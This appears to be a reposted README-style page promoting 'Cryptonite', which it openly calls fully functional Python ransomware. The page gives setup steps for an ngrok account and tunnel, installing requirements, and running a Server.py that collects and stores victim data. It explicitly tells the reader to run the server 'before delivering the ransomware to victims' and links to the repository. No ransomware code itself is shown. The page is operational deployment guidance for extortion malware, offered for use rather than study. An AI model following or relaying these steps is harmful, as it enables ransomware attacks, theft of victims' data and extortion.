👉🏻 Cryptonite has been designed to maximize performance with minimal effort. Anyone can learn to use Cryptonite. Two versions of Cryptonite are included. One stores data using Sqlite3 and the other uses Mongo DB Atlas to transfer results in the cloud. The default method is to use Sqlite3, but if you are interested in using the Mongo DB version of Cryptonite, switch to the mongo branch of that repository.
CYBERDEVILZ /Cryptonite Public
Fully functional ransomware developed solely using Python that uses minimum resources to give maximum output
1️⃣ Create an Ngrok account if you don’t have one.
2️⃣ Register an account. If you have the money, buy the premium version. If not, the free version will suffice.
3️⃣ Download the appropriate NGROK version for your operating system.
4️⃣ Unzip and install NGROK.
└For Linux / MAC users, unzip the folder via terminal: unzip /path/to/ngrok.zip.
└For Windows users, just unzip the folder
└ Make sure to add ngrok to PATCH
5️⃣ Authenticate your ngrok:
└Copy your AUTH TOKEN from NGROK config page.
└For Windows users: open cmd and type (replace YOUR_AUTH_TOKEN_HERE with your authorization token):
ngrok authtoken YOUR_AUTH_TOKEN_HERE
For Linux / MAC users: open a terminal and enter (replace YOUR_AUTH_TOKEN_HERE with your authorization token):
./ngrok authtoken YOUR_AUTH_TOKEN_HERE
pip install -r “requirements.txt”
Run the Server.py file before delivering the ransomware to victims. Server.py starts the server to receive the victim data sent by Cryptonite and creates an NGROK tunnel that performs port forwarding so that anyone from all over the world can access our server. Running Server.py also creates a database file to store information about the victim.
📌More details: https://github.com/CYBERDEVILZ/Cryptonite